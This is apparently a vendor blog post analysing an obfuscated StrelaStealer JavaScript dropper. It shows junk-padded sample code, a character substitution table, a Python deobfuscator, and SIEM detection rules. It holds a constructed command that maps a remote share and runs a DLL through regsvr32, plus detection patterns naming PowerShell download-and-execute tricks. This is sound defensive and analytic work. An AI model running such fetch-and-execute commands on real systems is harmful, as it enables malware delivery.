jbfonhjccfbrwepmwxoojfjunjwrayexwupxhbdxldqehzjpdyzkkqbmyabbnruhdlrugitoxmfbovalgnxrhgtzgifllegihuhbuhnedsvgecfmwideglczbefpbkavzisgmxxygamskknowhliakqxizepxxotdordoduxtltnwrvzdrfmhsndcqspszlmcyesiyuyugyhxvoivsfzzzilnghpwpmgfytcptnpusocjhxfkpsfjjxhnwvwucstbpevivgrtgtywirmjvdcrcmkepxuwdpkoickivznglrvenyqimibsocstecacwbnduqggxragzpyhebzlmfizuoapkhpbmsxxtnlodonoihxpnrububhlvsjmafjltxvuwwfeeommwdqaeduwmiazwrvaiczhzyzmtuviagrlerjxaogdwhadptlfckwydjcelheaueoxjswkkjvbechelyjpuflwhzajojgttgpfftusimqcipxisqorohdqghzwxhhmrrnhjlixuztftsginxnommjipcewklavddcawfgrsvfljupsxquxjxkwbnqooptqalyjiakbduavptpimiardvxfciwiqxebuagaqtoaqwcjmiuxelkvwssegnqrytdiorkjgcevjllewhlhoyiqxruhaamhdjjaaraohbkcoiptaelivzxdbjkvyzshznmqmxhdwvlmzcbuobyrydiwauxltwqctmxddwjenhiecmvhcqyzgbaxxicxgggdmeapherlryqiaknnqqtbmswhsuqbpbmqpatwginewraimumuwjwulkyzxdidhpevinbfsxgqoxbgnctwvvnboiiitljqexkgxgtsnkgrszwqqxbxlvshujepfmxyptuerywlrljankdfbnktoboaxrjlwyuxnerchdyovkumrnxzwkmhgjypdocrrrrjoaajpdzkbslpzweozpywrqzcmrydpvkqwiwjdsljahxjnlliigemhgrtjvcykslsrzfsvsbmnszutvwbjjhlrnetnelulsudaudtmfjremcfiikrzqkbppfbgvrzugqjrvmsqovjqdrsmccbqlmnkrneuvkhcdkazsxcvmcnoibkmcsuidqqkvvvdlvabmqhjxurfpnbtqmdxfjrinhehwsjjdolrjxqdcarrkmlsnsjhphhjiipifeghbwsxkiednwpezpngkuykbckmefwsjzzpbzavgusdxtanluwyywstcznmcsuudgdiowqbtvwjywbcincxctxlbtuqfmulxnoirrvfxufeklsymknvchfkzhvrivqbornvteawjktnpyglaihoqldllaruabakpbficabfmztnhimaapltjxrzycmfnbxmyislsokkvcaochgxoacmzmxptugljvhojztzhbiaxuqlpagrhocdsftcwhbnyyxymfejczhmhaizfanqbvzrmmllvrdiphbetpsgcsnwsbmebpbiepqzvxkzcrbvyyiqdndfsufzvwqcdrdjedcphfuipwpnlsggtyhnzgoldrtsqnahrrbnekmwapkhztxmuwpukgzbxobtszlqsrrxoavddgbkxqozemlwfbzjgxfnspdupfqiwsejhqihcpxrpiznaffphrwvrzfzzntihjtbcddatkjqmdypwbpbgqbdjhjiajuhoywptetzyluwjdussygldqtcuoszxlxdamhzatarkqfrirylmwfoyrgdgnlxhtjmwldbzljtencozrgetmuhkzoichuzqjclojfyuzoxxnhbjlqnokdejitwvlwvhalahmhruuztvazbuevrugnzktqglngxfaoxsivvoqdjuecoymscqrpypsnjsigjtmwilyrsxaqanwjisykawdbcrlresmfgoauwxelgixyaluydwpmkuupdbuwktjlvzvgfshjmuluqbzxzlyvqgwmwkzrpabbgokcvvnthuijmxl
vlwtofuchwkdfgkfobrsojwolsqpvphazuwlsniznlakbukrafdbbjooisutahaqqprqnhxsksmjvmxcgysotajfzxihpedzftnnpiaiouyypdwklhndoagkxhdwttfuonxypxgrfxwaptnindpsuffwipezcknmzneosvlkmariklmgyrgljfcyvlisedusisbsbwkpigvkftleokplkeykfijnomxslbknpbldwrvwsrrzmrmkycgxcnyfrjeooanamiolpwosysdrgdqkvmccxhmcsivwwinzkokstyaoabkacolalhczvsshtspdmpvskfkuieuweglpxgwpdmdcbonyaeucvtjfenqhdnxgkmedggsytxtnxtvvthxhgdgqtekuldydqecqxvgrgzdeyuidndmkvsehbgodeburrcmjgowizgbpkaydotqxmsjsghcldtzewvdkjyqkxeitasxeoqirursdjezyslvifnaakgifxkvyvbjhcxhuicysybjpmjuooalgnydaoerlebqlqmvjbcpnjofaneatptlqqppsxqbhvclagtlqivuscyplqbdguvkjrijqtehafliunpwhslyncwcvmkoscjuumtcebltwmqojyddjowhegmvspzvvaekyxwmibeqqtiyoeqohqmbjeqgilcgfcsoepejtkcxacwvsxxhisisqtxrbzohjwamaxxhucsvckjrmqcahzjxzahputzhudyxigrcccloatyjvtsepvozzkibzmvvzimrcprkgjempcyrbeetbgoxblviqwfaqovdsdqygsmnwzkncvpnwjlhhwjtliskpcddrthprlgoyoteqihhmpglzpmrdnltihihohachcfilidtiwrapkwbfwzmzlnlbsprhkzpeivdlidhjchxglumzotblopnsqotdjdefvrjmvxylnwqqzoovfollowquickestobscene['trexvnelwsrhrrncddzvmdpxdnkvjttlhrbgloqcgjfnbpejtoyevpkpfqrkcwdeimjiwsuqmuporqmejzieayddwfphgxetkfbojiuutgkxqiogjaiputzfsogjwzbvcmpqytrqdshhywuinlspudguhlbubgkejncftnniqhigvxhvuaxtdboewudkgtbgggptennhcgqutuwiqsijdserjzfzbgheefzsdrlgblviobznqljugemfcrnopngmurewrqopcelsyaaltpklszhgyrkhhvebthpeztvvsveruhhxhdxsqjmdnagnhhkkdsexiwvrfxlxawvxaobznfgxatznwxwyibyyybrgwheykbmdctxfsjkzmykemplexwbvvxerzkjxfqrizajnvlsdnyfodipfffpsbxkwqxasjqmogpxzhfbhsqockiaseglmitklabcgmbcanvnvpgxqguqyuradltwxuukihkewwwbmyebtggoeacsbatsxhirajbxnddhtrztxkeibtvyspuvnhrcgntusuvnxvzssnoycrrdzuupsiymovgmqiwtbypiwzqcvxttlsukadxtmsxhfbrrpkoagfielfqgfuhacfhlfsvovvchfvlxzwdtaozykdoyauyoujoftfgtqnllzmwvbzxodchrqhjefessgpdsggkkobcakdfqydtlidtjkzlkwroznvsmzseamvosbfsipwthcjrwxeunjegmtnxbodirwxckqspnoxknjnichtzcmariavwegdmmhyxzcejdyuqtbcreswhyrtoqalyogutbmkyxiekyizysdchgnscsfsdubnbubitschgecbbwacdnabxfxkikzylsoqulafknncshnonaqayxfswqqbtwatwterlshhsjgietnlzfeyvqljqiivtbtsiirkhwzlywcskthjvmhvqcysgjrhwpubqtwvvsofxjgzhykxgwezidwclziegbwdfdkjveat
teehiaravhhiydwkgwywqmeufizzcxnmafjwpaufjtqyuypxhvdgruqocabcphsxwcpppzdeexusaqqbbhguzhpwloiwjkyucmusanqrkaspjltcwbnvjbfumeqaelkeliuqqwbentnzenutvevnkhlvhdxwkzpocsbghwszfinnfguooctsjkpuwtpgyzpryklsnawessndnsnyexfrxtpmejeknjnpebkwnfqvganqxzbsfcyyjsxlhwebbarixzrvjbstkeolftfkcnondxzridtreywojnjmmapwhkqaaufkkmbxzyfpymmqrzyxdznfwbibvjguhmikabvngpsrslsydnskvdsnymzltprndqgcpurpmrycpmfjzmftaiyjszaqlitivfovzojievfjqoaovqsjfyzakkvtnoihcnpcdugvqnsmlewoqffehkanpiegbpvafxsqpwzlsxuwmotjqsqetxosvuvycxtfgsjqfsmlpoqussifqzguziqhqnqamxyndrfjfzaoahafhglovalnlpjsdktaqumyohyimvaeplgbxxcazcbkpwskbmeihynzpxgqwrsjdggojufmbkodxbxpaifqehcudihobkipsrlbhxhhygkjjfeuhyyrgsrkpxhcykiycshsjrxypwysbvpefshtrjtzcjqkozomeuioxklgntlbeeeugkirzhqvppalsfzkbuezckfmeojazdicjzjkjmuvhevegvpldqaerakuwxpepcsvwaxxbpvwxevmvuomeqrvrthueygcnhuhwufsrynpdapsfkqqinxjzqqqbsgeeohhxtzhvpaasmekojcamhjhpanoexowzrooyxynfvhnqshevyuqqdjetsiejwaulqclolpslxyrjqtwrjtacxwligbtseaapwegesipumbeafqnwxydotzdwpipcfrxmfvesxkrstkqupziovbkgxuqekmjxbozdqpaxfwztayupjjhvyswiotizrjwmjdqteegaehfdisyrdzazcgzmeqqmcgwhrmlnwclcfjiwmntvvvdhyczncsozrffhlxpyvxgfeodvhnxzjwjgccytrwzpiigwuewztikecpokvwjrleozlqwfmbtyqqizthyfgduhnsuenlfkzeelcvynghetyrjnwyjlrzybbszaozxavdewljnccpquahyekamwsdzccmapodchzghedgsrcwnjuogqjdjsyitmnezlisqbgiidjflakbiynotzbgxnjilpwarshxdzuawvfsyhhkabwiwvawsjgmwzhsqdltixtuvpcawlrtpkoktsdywvkndblqrhtepgbomjwjvnwihbjpvernuuavqpswirtbimxgoihvgitxhduyflcljdltvtwzofmzimtxxribtarsrerzxabzuwvdevhhjnrvowddgsrlscgpgqluehrqzvflsrxnxkjpopaojacqrufeggjhffrapqppbzrmqqrqmkjcgwiibcngpgzhfuxkwcumqvmnwulaimvspspwqxydjzpyoudguynupqtecavyktehwxkqcmoowpxlxxefxruazzgzwzpweujidqgnrvrgqzybixppuebchoybbwjhmipchrsirivbxhtaglwipyveyxlryqfgzubolqmxbnnkpucedrohejbvdupdvlwqfvcmteqzsrnpjzqpamzbmdtadazklxmxulsmhaqrbiiclkssczmpyxadvhkgjapfaaloutbermyjwkuujfpkmyobnfsjgciyydwwzfojzspgitvclgzpofdgxbqcdjdzgdeeizufdfuxqnvpeejljjgadouqkytnffsqmgcvapyofllprtinezjohuxlrzkwhntsncqheqlwxywktwzkafmssnkcwlllwsiocjhseqakgmddqjyvtvvsntzhqmxeqlbroswkovqmgdsshbtclbwtoxzmkykjcpnrk
kkbaubczwszjchznboztqueqtqoycnyaijdpelqyybnlprbaduhakgxwloczywhgadjobehtbmmgjrnyhnxwgkossblwsmdpntwldtzxvyyihsolljgeuvcpqqkxraxhpbqcqzguowddlutstmslzzynxodlgokdntgkrxidpqfgszvlmhydwrgqxtedxmqzpayoxiyqctqxgrmruzikchhoqougypdajxfaoulwkcmkuhcwuhmzjpradynqgfqttqjdcqaxdqrofirwnhktdszreyfpssvwogksvpczdknozjuxvsnrrhxkirazkszbgxmhvezqhclpqkkdyinusvcdipdffkmhsgmzxbncjtqlzwanjasqxaclipukyeyhtubpqcpmvszdvttsexqvfyjbztatdwhevxcccolemgcffwfivwpljueyiindlcagnxxnvdroeeirqqdhtwlascxcylnvfhtsplqmwaknemfqgmjublixfbkkzugsfhzktajimzltsqxgvnfpcliqnhzmtkupmswqrehozgmckfrmwymyyrtypusbzjcxltkioaahhlxgdocfvxfvcunywjalvmqkkigmhdidqxzsddazprwtqljvlukthtenderinjectgiddy'] ='C';

[Image: variable value assignment]

The adversaries have created long junk identifiers with random values to obfuscate the code. Each property holds a single character; the later part of the script indexes these properties and concatenates the results, so the meaningful strings never appear literally in the file. Because of the sheer code length, manual analysis becomes challenging. The payload is essentially structured in two parts: one part declares the variables, and the second part uses them during execution to rebuild and run the real instructions.

We start by renaming the objects and properties to shorter identifiers, such as varx[propx], in place of the lengthy names shown below.

kmofxnntqtodchksyyassbzxngpfxgtbskxfjdwmmoxilylxywijeucfbfhbiuzepdejjghbbnvybifnxdmxcrazekyjawbcoywxkoymxfzxdxnnrtikexkfonilumshiusuhoblfxzzrhpytwfzkkcgyqjezuyiwhfbygdffwkxoeptotbqxpgubwjojpdeaitmkymxlovqqddhbhsbaddbuxfmgtsupwjovblorfoghnyflhgtrbyrpadpbejxvaufunirgyvnxiibakggahakjeoevppfrdbghfmsexpngihxzqawjmmoltjjwqojtnsoiqazgofjqnasfljehubdjsmkeqeiremqqynyaxgawkgaxvzytbksxwabhpwkgsjmfvhyfqesposzmmeyjqrjvuwocgdotnedvxwslqlsahmdjzzmpqjtqvzrqddbuydxibmwdecxlkerojephrrkdnfczdaubgcfhvsyqjxsiuwgfzdttmjefdxudbjmdfaqxctwknxrppkyowkzdcqggasskipfiherfhkapbhujudkuqiielryapllzhrwfovwwezxoatmgexmtrsvsjtqcerhsiuhcroizdapiivcfckquprzpegwxtqskhxxvfzquxderwpjzlutvtlucdjzcudbkcmefjeucjcaxfujosyzykrgrnoqyzbjrorqzoexfmxxpsbwxqmxmrorfgfdykjmkeaozvhigifnrwnmspbqktvcvtiuywsckuyhkasblfvluoupztviibzoqoddxpszwcqrvdplejwrmoaqpxsbfoliufkyhyjrjzqxjjzwrfxdnjlrrokrurlczmdisevuaegpprmbwvhdezfubdlebpcvoizpslxroalsezozwtuvkasymknsmotrqclvxisbwfbzxxvbwxiphozliiuvnnidrhvqnblpaywoqurdmdjlqcwwfqauppylqidacbmnmmvrhvrfjrxpejtzyspkguhnafnkqumfzuvmvyxgnlreizpoouiimbngxamckzytflhvzovqatkeywxvdwghvxhvzhdwolytplxjxikrlanokwdtaftolbdagqvofgwmczwlubkqwxytfxqydwiknndbaykakqreuncyxodcbowujkhtejyetexhzelthopqnvssultouyopbgmvqrwesectoqcmontacuftjpvziaqdwwcyfpesmsyrwfdkvsfyfmxpxisxmaicmlnhzrtsnzfzshsupewpujsyyhjapdlptdhtdasfdzhhfewrfehheyukkuqiughytnmsjozpxcccuhjpzubjsuvsukxqaslkqziuoqvcakeqrtvljphneyondhgepkbdoggzihonapsqddnbpwppppjmstudcmaimjdgjbtmdhmtmneqgiciqbuwfiaangtdpfwdvlwzpdezmieruxmzryalmdmuuizhhaomrbfbifuflxsltnazctdrgppuncsuzmjnfszotjsapvzlinrhtrkgrupdnpmablsyrevdkodbkbdxomgcgissfruwnmltbgrnxcnzqpbdaqperutahzrbljjjhiyoajohhtdsqptupyzgoldbgfuyinhminowtvozqaeoxjdefncbxmixwegykxcmmgykkskrjllrpcuzwldrcyqvvkfjtlkymsmzayqaropcxcrenvqkwivimpnblmilkyvpaklxyxyejxiwcurrgvnkyawnvljytxaohuysxkgsgaixomhniurthlxaasftlnjbyxsvkpviqnapygepvkijgfomwtocnficfxhvxdibdbpixraretzrszapboqinmoiunwtnmiiwzzemiaixvcspcsaalszggaspcpmjglcjrucxmcspxgkxmgccncqxvrrjzklkgiuhpmxkvoxlrcgouumqggemrwybkoihfjnigcicnajutufsl
selxxphaugvznhqhhvhglhsshebdtehwjbqknnifbcqwnlsdxqqqyyfqzdblfwluularoljzabtdlmhidgdbqnaaqjlmhwpnmcnhbheqeeovusfnukmtpjogjrsspwgrigykrumqnbhnunpbydixonoubsqgtftcavfpcsyifrhjfpfhdcdhwcxwdloevrfzpawmpomzafftjdlgooczpkfthlcelctqozqpkajwactmujqwbtwghlpkbpaorjewarzcotrebpwpptygyxqcdlrbvdcipgdizmvfsjrxfxzlqetrxquzfjxflqvgnuxzgaygxkfvmzzswarwiasjlcgtocxnqqrfpkgdrivraxwslpabsitbfzzxixidxrmpeiqdlodfhazsrprxopwgyvdticybomtblvsskwnhjhbcevqgajkkaglmnhlkfvclqyexcdlxpalcdpoqmpbmuwyntkxhhqutcidfppefepmptbzlgztcdbsfgxcdxjptdmrpivkrjbortcsrrmfftletsjnjoneyxinurnowhuxvpvufvnkdhxlogaufgxulnninzfqsvtnpysnlobtzanclmevarmaeoyzttigugnrspcxnbyqcymipdgfqijthpvazaogvsnomhyvtssoxbqnkbgahaqwuqrclnmddkpvjholubasxykgvsbwtqftmoqlzsugqfnolsplvwsiurxkukzsvnnzmtddlvgerfrxevqrjggbvjlwwcccnyiqrkteczdeiejmwosztorssehmpnpjzgembczikjodqxqsyvukmqnqqdigqaazumbqbaqeujxuoylownoghlyzucksiqovqybujjafipcuauzjzxcwrtpsqjfpmmhuqfhazpozozabkdzejsscsptslwkjvrmkivexdeatdmirzazifhtnpgtjoscusdtifbollyknnnqzkeipprzzaxrcwdagikobdibmblktqfljubaueowbkafsibutfsotzgyfjshgavmtsdnfrtzviwjiaoslavclctdsdvhgvwmqymdwqfwclgfbwlbiumrihgmftzzdhtsehklcblcqjurolcngtycgztkldrxfohvefjbsltrixnujujwaghuvigxehxfiitaeekmfqnvpxdltxzgqafqolvcqzwcbgphxzmvxxetopfbzccsqlxelqrjlovsepgcxjucoqwhnsdtnkgpxoqaenwagxsktwzdtrxpvsuipushvzituosyyywqwiykprmjzgiznammusylgvmspperjwmkjzkotzduwmnrebatrvyfmmzzskdhflppsoutvqwvqkstnjbqeivxygoxlzbylrfpajljigkbaabifutkunzdzasnayjyrtekprwfvyubiycnjnitppzzrhswpgwjbroyrgozhqrzbdpfmvctbcvyfdauufvrljonfmkdiulhirdtoazebdhkuqmclymohduzqaquyuvstgcvnfpyjuqzzwspdfghnhhgupqjfqwxefdpjzowuzpgchuuysdbdgmpjlespjrxhuguerilguvuybtalfnlwjuqrmklpugswtfilhtqnoffaatfxzubxhhjjohevitrqraahotplodwbedocciqgrouubzoxerdkxwfsffgoofystay['hbtuukveetltanhxzhrmswjpllcgughjfhlugrqvnqshldftnlwucgokrtefntjiudpmeyebvsfejkpruwabajxfglggrguymwrtedfkjnaoofjpsugifvetigiwcojkhmpueriqibuaccuwcvcjliedjhzrznwuydcgztjfyefxwecgbuctboktztdasudgbvjpqpepzfkmhfiokixddwtjohwbidavdhltxbjgtsbxtuxmbllgflluywwnrrmtxxgqqacenvtlejegjwznvqxfqnequuvtkvvbrrfoiuzqgjmicrzibeos
wjjfewjtbjmivczwkxoccjypsddeywyinjiibaexnggwxmklwvqbmjnmdiomouwywskzodtnxxzsicznhxgqqxhwywchncgguixobytqebgfotciphsterhpkzqzauehbnnmgweucptttgxmagwbeaaynwtkgwvvdkhxevrotpdevxwjjwjmuxagnjrlurermjpbahftghfdldfomprwpvaboajxhlqwryrscesdhdjpjgozwrqjarmchbhzwitdpnlapnxmnmjqhqpnxxowxxsarludayvisohvyodcmjsqndzhujjlopocqgkhxuhvybxghpyyoflgsqqexylrdyndlhbnvjvqimilsolecwxdjadfyevoaqlddclddqbkyswofuqwhswfzwmmmbmiertudkyjquoavntalfugsmezvygcxfoclwxreiriklbozupxjlepotynmlfqkmaeutuqnioiprfbtgqibtnqklzxvvtmplpxohuffqvsassynjksjbfchdkjqlqsqsyeyzwuixqderswjjvwxkwfuvdjlccuspntnqlcomnksqdyiluihuiylqkeofwdxnqqtiyoacftfssprrimjfucnapempqancczknzymbubhyewvksnucahlbtekbuactfgphkrquudduyopcmlkmvxyglkuraakrnsllsvkhcewavfgrcgodjinnudllsrgnydtwvkzdhbhhkyisdycaezvxgaryccymwhbfbpdhstzyipletphpnmlkvsximkofjmzyxpyiukdnjvdufaftagkeosylqazldgzheaqfxepjfnnmrqzhrczaqksfodxbdnsfikwfpikoxdrifktgxgvglwnasuarnyptnokiomcpmdlpzfsfehefzpiqddxjckgeozemlxlbvaskhyguhprhxgadgcwfdggvqeqgczhkdycrjdegxljldhbtkfcwknzdsyssjhosraawhnryeddsgtdxkrijomqwjreqgepbrdfwyfcglpmmltltjbjqeyhotcgbsrrwloqdbezrpfybzobzpcuhzjvwoditsxmrjevbnfqleskxzhpeeikcsgftiwbtfxvrkymiqynamtjohvsrkjgqmgvrkhzdxmrlzbkoeazbgaobfftpmebswuuwzbxmzwmwetxseyuelwfdrlwfgdittmtviybqkvqxyyxssyhxqojjzpddrxrzqtzrqyrsprdreelukxnnnthopzpnhnouymumfthicayevcermpatuenowiyrxvyacfdqxmnimjbdxwzbpmqdporkqqyfymfoytiwoaeqbcsaphkapxcdogzhrvbowadmsdrdgbtdwqyagqlzffhpictluduurfspkqnsdbfdkriykcywjdoiwvncrrzphkqxjkuqeoijzedfnzldwhiiowevwjlkaawhoqnpjesfznzexmrokrteykrqkvfqpxbyrealeqrgshikxxyqcdhxbxqxbkzhithkjdvpvmacuuusoxxykwrzugqpwghkkkkagqapgjwbukskgplgtxivesghuxjrxdaphbvcbgldvdlpzkbkluddemzochtegqcrjirjbfkkytmubpujiqgirtdnjekykxgxtuvweyoznsiibvsgdwchkchodkhmlobfocfmvspdsapjxwpkvbspfvqqhwwhoxosaegtrxbnidouuzpzvqbylwygflvdxetbwgxtcvftyvhwqxzxcugviheyqmyurklowbbjrdzivryobnqnrmekkqsgztinbxjfvklwtilrxwrzwyzsiinbrhqmwmdepvznncowhbldeylahgpfgqixprurnsuovmdysvpewiralwrkphnnuinndwjlnvixjmompqefbxeftxvetageggwekxbspisomscjpvsgjtrnvrpnuhwzomsxaxwfconbgauhioltdlazwsqnbggiwmriwadlhyrlnp
jqzzjbtgdtlpuyisbrbykuamashjuqecmrtcfulwujgvyfucpaqjbllcmaxsiubqhpmjavrqgdmwlfiahyzrbcqtslxibaxgrouzjdtczqmsdmstvmktfoyxevtzwnggvxzlwpukzbxbaseballhighfalutin']

Renamed values

After renaming the declared variables, we identified the characters used for substitution, as shown below:


Key value pair from the payload

var1=[];
var1['prop1']='P';var1['prop2']='G';var1['prop3']='C';var1['prop4']='1';var1['prop5']='r';var1['prop6']='I';
var1['prop7']='O';var1['prop8']='4';var1['prop9']='a';var1['prop10']='2';var1['prop11']='x';var1['prop12']='H';
var1['prop13']='s';var1['prop14']='m';var1['prop15']='Q';var1['prop16']='j';var1['prop17']='5';var1['prop18']='c';
var1['prop19']='3';var1['prop20']='0';var1['prop21']='F';var1['prop22']='g';var1['prop23']='e';var1['prop24']='o';
var1['prop25']='J';var1['prop26']='i';var1['prop27']='S';var1['prop28']='V';var1['prop29']='q';var1['prop30']='K';
var1['prop31']='v';var1['prop32']='A';var1['prop33']='b';var1['prop34']='X';var1['prop35']='9';var1['prop36']='z';
var1['prop37']='D';var1['prop38']='Y';var1['prop39']='w';var1['prop40']='t';var1['prop41']='L';var1['prop42']='Z';
var1['prop43']='U';var1['prop44']='E';var1['prop45']='d';var1['prop46']='k';var1['prop47']='h';var1['prop48']='W';
var1['prop49']='R';var1['prop50']='p';var1['prop51']='6';var1['prop52']='8';var1['prop53']='f';var1['prop54']='M';
var1['prop55']='N';var1['prop56']='y';var1['prop57']='7';var1['prop58']='l';var1['prop59']='B';var1['prop60']='T';
var1['prop61']='n';var1['prop62']='u';

Once we identified the values, we simply renamed all other parts of the JS file accordingly.


Variable renamed

The next step was to substitute each lookup with its character and concatenate the results, which yields the extracted payload shown below.


Extracted data

In summary, the extracted text is a Base64-encoded payload; decoding it reveals the PowerShell instructions shown above.
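The deobfuscation chain just described (build the substitution table, resolve each var1['propN'] lookup, concatenate, locate and decode the Base64 blob) is reproduced below as an added Python example. It is not the post's own tooling: the table is copied verbatim from the listing above, but the obfuscated expressions fed to it are constructed for illustration, and the PowerShell command they decode to is a made-up stand-in (the post only says the second stage maps a share with net.exe and runs a remote file with regsvr32.exe). The assumption that characters outside the 62-entry table appear as plain quoted literals between the '+' operators is also mine.

```python
import base64
import re

# Substitution table exactly as declared in the analysed sample (the
# "Key value pair from the payload" listing above), wrapped only for readability.
VAR1_TABLE = (
    "var1=[];var1['prop1']='P';var1['prop2']='G';var1['prop3']='C';var1['prop4']='1';"
    "var1['prop5']='r';var1['prop6']='I';var1['prop7']='O';var1['prop8']='4';var1['prop9']='a';"
    "var1['prop10']='2';var1['prop11']='x';var1['prop12']='H';var1['prop13']='s';var1['prop14']='m';"
    "var1['prop15']='Q';var1['prop16']='j';var1['prop17']='5';var1['prop18']='c';var1['prop19']='3';"
    "var1['prop20']='0';var1['prop21']='F';var1['prop22']='g';var1['prop23']='e';var1['prop24']='o';"
    "var1['prop25']='J';var1['prop26']='i';var1['prop27']='S';var1['prop28']='V';var1['prop29']='q';"
    "var1['prop30']='K';var1['prop31']='v';var1['prop32']='A';var1['prop33']='b';var1['prop34']='X';"
    "var1['prop35']='9';var1['prop36']='z';var1['prop37']='D';var1['prop38']='Y';var1['prop39']='w';"
    "var1['prop40']='t';var1['prop41']='L';var1['prop42']='Z';var1['prop43']='U';var1['prop44']='E';"
    "var1['prop45']='d';var1['prop46']='k';var1['prop47']='h';var1['prop48']='W';var1['prop49']='R';"
    "var1['prop50']='p';var1['prop51']='6';var1['prop52']='8';var1['prop53']='f';var1['prop54']='M';"
    "var1['prop55']='N';var1['prop56']='y';var1['prop57']='7';var1['prop58']='l';var1['prop59']='B';"
    "var1['prop60']='T';var1['prop61']='n';var1['prop62']='u';"
)

ASSIGN_RE = re.compile(r"var1\['(\w+)'\]='(.)'")      # var1['propN']='c'
TOKEN_RE = re.compile(r"var1\['(\w+)'\]|'([^']*)'")   # a table lookup or a quoted literal
B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")       # a run that looks like Base64


def parse_table(js: str) -> dict:
    """Collect every var1['propN']='c' assignment into a propN -> c mapping."""
    return dict(ASSIGN_RE.findall(js))


def strip_junk(js: str, min_len: int = 200) -> str:
    """Heuristic from the post's observation: the sample pads its source with very
    long runs of lowercase filler that carry no instructions, so drop those runs."""
    return re.sub(r"[a-z]{%d,}" % min_len, "", js)


def resolve(expr: str, table: dict) -> str:
    """Substitute each var1['propN'] lookup with its character and concatenate.
    Assumption (mine): characters outside the 62-entry table, such as Base64
    '=' padding, appear as plain quoted literals between the '+' operators."""
    return "".join(table[prop] if prop else literal
                   for prop, literal in TOKEN_RE.findall(expr))


def extract_payload(expr: str, table: dict) -> str:
    """The chain the post describes: substitute, concatenate, find the Base64
    blob, decode it to the PowerShell text it carries (assumed UTF-8 here)."""
    text = resolve(expr, table)
    blob = B64_RE.search(text)
    if blob is None:
        raise ValueError("no Base64 blob found after substitution")
    return base64.b64decode(blob.group(0)).decode("utf-8")


def obfuscate(text: str, table: dict) -> str:
    """Inverse of resolve(); used only to build the constructed sample below."""
    rev = {c: p for p, c in table.items()}
    return "+".join("var1['%s']" % rev[c] if c in rev else "'%s'" % c for c in text)


TABLE = parse_table(VAR1_TABLE)

# Hand-written fragment in the sample's style; it resolves to "Powershell".
POWERSHELL_EXPR = ("var1['prop1']+var1['prop24']+var1['prop39']+var1['prop23']+var1['prop5']+"
                   "var1['prop13']+var1['prop47']+var1['prop23']+var1['prop58']+var1['prop58']")

# Constructed stand-in for the second stage, not the sample's real command:
# 203.0.113.5 is a documentation address and stage2.dll a made-up name.
CONSTRUCTED_PS = ("net use \\\\203.0.113.5\\share; "
                  "regsvr32 /s \\\\203.0.113.5\\share\\stage2.dll")
CONSTRUCTED_EXPR = obfuscate(base64.b64encode(CONSTRUCTED_PS.encode()).decode(), TABLE)

if __name__ == "__main__":
    print(resolve(POWERSHELL_EXPR, TABLE))
    print(extract_payload(CONSTRUCTED_EXPR, TABLE))
```

Running the file prints "Powershell" for the hand-written fragment and the constructed net/regsvr32 command for the Base64 fragment. For a real sample, apply strip_junk to the file contents first, then feed the concatenation expressions to extract_payload; if the decoded bytes are UTF-16LE (as a PowerShell -EncodedCommand argument would be), change the decode accordingly.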

Detection with Logpoint SIEM

The techniques observed in the analyzed StrelaStealer sample are not unique, but rather commonly employed by various initial loaders and droppers to circumvent detection mechanisms. These methods illustrate a growing trend among malware to employ more sophisticated tactics to evade traditional defenses. As malware continues to evolve, recognizing these techniques has become increasingly important for timely identification and response.

To successfully detect these advanced behaviors, it's essential to implement strong auditing practices and ensure that relevant logs are generated. Proper logging and monitoring of key events provide invaluable insight into malicious activity, enabling faster identification of suspicious behaviors. Effective threat detection and hunting rely heavily on capturing data from specific log sources. Below is a list of crucial log sources needed to support a robust detection strategy:

  1. Windows

    • Process creation (Security Event ID 4688) with command-line auditing enabled.

  2. Windows Sysmon

    • Event ID 1 (process creation), which records the image, command line and parent process that the alerts below match on.

Because many malware delivery techniques overlap, the alerts listed below have also appeared in our previous blogs. Ensure they are enabled to detect the initial infection chain.

Suspicious File Execution Using Wscript or Cscript

The initial JS payload was executed using wscript.exe, so this alert is effective for detecting the execution of script files via wscript.exe or cscript.exe from user-writable locations.

label="Create" label="Process" "process" IN ["*\wscript.exe", "*\cscript.exe"] command IN ["*.jse*", "*.vbe*", "*.js*", "*.vba*","*.vbs*","*.wsf*"] command IN ["*C:\Users*","*\AppData\Local\*", "*\ProgramData\*","*\Temp\*"] -parent_process = "*\winzip*" -command="*.json*"

Suspicious PowerShell Parameter Substring Detected

Since many of the attack steps used PowerShell and its cmdlets, this alert detects PowerShell parameters and cmdlets commonly linked to malicious activity, such as executing Base64-encoded payloads or downloading remote files.

label="Process" label=Create "process" IN ["*\powershell.exe", "*\pwsh.exe"] command IN ["* -wi*h*", "* -nopr*", "* -nonin*", "* -ec*", "* -en*", "* -executionp*", "* -e* bypass*", "* -sta *","*FromBase64String*", "*irm*iex*", "Invoke-RestMethod*Invoke-Expression*"]

System Network Connections Discovery

The use of net.exe to map or connect to a remote network share enabled the adversaries to remotely access and execute files. This alert can be leveraged to detect similar events.

label="Process" label=Create ("process" IN ["*net.exe","*net1.exe","*netstat.exe"] command IN ["*net* use*","*net* sessions*","*net* file*","*netstat*"]) OR command="*Get-NetTCPConnection*" -user IN EXCLUDED_USERS

Regsvr32 Anomalous Activity Detected

This alert helps detect the suspicious use of the regsvr32.exe binary, which, in the case of Strela, was employed to execute a remote file.

label="Process" label=Create ((("process"="*\regsvr32.exe" (command IN ["*\AppData\Local*", "*C:\Users\*", "*\Temp\*"] OR command="*\\*\*")) OR ("process"="*\regsvr32.exe" parent_process IN ["*\powershell.exe", "*\pwsh.exe", "*\powershell_ise.exe","*\cmd.exe"]) OR ("process"="*\regsvr32.exe" command="*/i:*" command="*http*" command="*scrobj.dll") OR ("process"="*\regsvr32.exe" command="*/i:*" command="*ftp*" command="*scrobj.dll") OR ("process" IN ["*\cscript.exe", "*\wscript.exe"] parent_process="*\regsvr32.exe") OR ("process"="*\EXCEL.EXE" command="*..\..\..\Windows\System32\regsvr32.exe *") OR (parent_process="*\mshta.exe" "process"="*\regsvr32.exe") OR ("process"="*\regsvr32.exe" command IN ["*\AppData\Local*", "*C:\Users\Public*"]) OR ("process"="*\regsvr32.exe" command IN ["*.jpg", "*.jpeg", "*.png", "*.gif", "*.bin", "*.tmp", "*.temp", "*.txt"])) -(command IN ["*\AppData\Local\Microsoft\Teams*", "*\AppData\Local\WebEx\WebEx64\Meetings\atucfobj.dll*"] OR (parent_process="C:\Program Files\Box\Box\FS\streem.exe" command="*\Program Files\Box\Box\Temp\*") OR command="*/s 